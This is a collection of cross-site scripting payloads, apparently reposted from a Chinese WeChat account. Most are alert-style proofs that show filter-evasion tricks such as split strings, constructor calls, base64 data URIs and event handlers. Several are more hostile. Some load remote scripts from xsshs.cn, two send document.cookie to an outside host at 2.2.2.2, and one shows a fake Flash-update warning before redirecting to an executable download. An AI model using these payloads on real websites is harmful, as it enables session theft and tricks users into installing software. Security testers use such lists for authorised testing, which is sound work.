xss payload集合

<script>alert(1)</script>

<script>prompt(2)</script>

<script>confirm(3)</script>

<script>console.log(3)</script>

<script>document.write(1)</script>

<script>console.log(3)</script>

<script>document.write(1)</script>

<script src=//xsshs.cn></script>

<img src onerror=appendChild(createElement("script")).src="//xsshs.cn/aaaa">

<img src onerror=jQuery.getScript("//xsshs.cn/aaaa")>

<script>window.location.href="http://2.2.2.2/?msg="+escape(document.cookie)</script>

<script>document.body.appendChild(document.createElement("img")).src="http://2.2.2.2/?msg="+escape(document.cookie)</script>

<script>alert("您的flash版本过低，请更新您的flash版本"); window.location.href ="https://www.flash.cn/cdm/latest/flashplayer_install_cn.exe"</script>

name=<script>alert(1)</script>

name="><script>alert(1)</script>

name=1" id=javascript:alert(1) autofocus onfocus=location=this.id xx="

name=javascript:alert(1)

name=</script><script>alert(1)</script>

name=';alert(1)//

name='-alert(1)-'

name=';};alert(1);function a(){a='

<?xml version="1.0"?><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'></a>

<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(1);</html:script></html:html>

<?xml version="1.0" encoding="UTF-8" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve">  <image id="image0" width="751" height="751" x="0" y="0"

    href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" />

<script>alert(1)</script>

</svg>

<script>alert`1`</script>

<video src onerror=a="%2",location="javascript:aler"+"t"+a+"81"+a+"9">

<video src onerror="javascript:window.onerror=alert;throw 1">

<video/src/onerror=top.alert(1);>

<video/src/onerror=top[`al`+`ert`](1);>

<video/src/onerror=self[`al`+`ert`](1);>

<video/src/onerror=parent[`al`+`ert`](1);>

<video/src/onerror=window[`al`+`ert`](1);>

<video/src/onerror=frames[`al`+`ert`](1);>

<video/src/onerror=content[`al`+`ert`](1);>

<body/onload=eval(alert(1));>

<body/onload=eval(`al`+`ert(1)`);>

<body/onload=open(alert(1));>

<body/onload=document.write(alert(1));>

<body/onload=setTimeout(alert(1));>

<body/onload=setInterval(alert(1));>

<body/onload=Set.constructor(alert(1))()>

<body/onload=Map.constructor(alert(1))()>

<body/onload=Array.constructor(alert(1))()>

<body/onload=WeakSet.constructor(alert(1))()>

<body/onload=constructor.constructor(alert(1))>

<video/src/onerror=[1].map(alert);>

<video/src/onerror=[1].map(eval('al'+'ert'));>

<video/src/onerror=[1].find(alert);>

<video/src/onerror=[1].every(alert);>

<video/src/onerror=[1].filter(alert);>

<video/src/onerror=[1].forEach(alert);>

<video/src/onerror=[1].findIndex(alert);>

<img src onerror=_=alert,_(1)>

<img src alt=al lang=ert onerror=top[alt+lang](1)>

<img src onerror=top[a='al',b='ev',b+a]('alert(1)')>

<img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>

<video/src/onerror=Function('ale'+'rt(1)')();>

<svg/onload=javascript:alert(1)>

<iframe src=javascript:alert(1)>

<form action=javascript:alert(1)><input type=submit>

<a href=javascript:alert(123);>xss</a>

<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=>

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object>

<embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+>

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<input onfocus=alert(1) autofocus>

<h1 onmousemove="alert(1)">title</h1>

<select onfocus=alert(1) autofocus>

<iframe src="vbscript:msgbox(1)"></iframe> 

<iframe src="javascript:alert(1)"></iframe>

<iframe src="vbscript:msgbox(1)"></iframe>

<iframe onload=alert(1)></iframe>

<iframe src="data:text/html,<script>alert(0)</script>"></iframe> 

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> 

</iframe><iframe src="vbscript:msgbox(1)"></iframe>

</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe>

<details open ontoggle=prompt(/xss/)>

<plaintext/onmouseover=prompt(1)>

javascript://comment％250aalert(1) 

<img src=x onerror=confirm(1)>

<video><source onerror=alert(1)>

<audio src=x onerror="alert(1)">

<body onload=alert(1)>

<body onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<textarea onfocus=alert(1) autofocus>

<svg/onload=alert(1)>

<details open ontoggle=confirm(0)> 

<svg><script>alert&#x28;1)</script>

<svg onafterprint=prompt(1)>

<svg onbeforeprint=prompt(1)>

<svg onbeforeunload=prompt(1)>

<svg onerror=prompt(1)>

< img onundo=prompt(1)>

<svg onchange=prompt(1)>

<details/open/ontoggle=(confirm)()//

<img src="#" onmouseover="alert('xss')">

<input onfocus=write(1) autofocus>

<a href=https://baidu.com>aaa</a>

<scRipt>alert('sss')</ScRiPt>

"-prompt(1)-"

'-prompt(1)-'

";alert(document.domain);/*;var%20dk4trin="*/";

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

<code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

<script>top[`al`+`ert`](1);</script>

<img src="x" onerror="top[`al` + `ert`](123);">

<svg onload='top["al"+"ert"](1);'>

<video/src/onerror=[1].findIndex(alert);>

<input type="hidden" accesskey="X" onclick="alert(1)";> 按Alt+SHIFT+X 触发

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

原文始发于微信公众号（爱喝酒烫头的曹操）：xss payload集合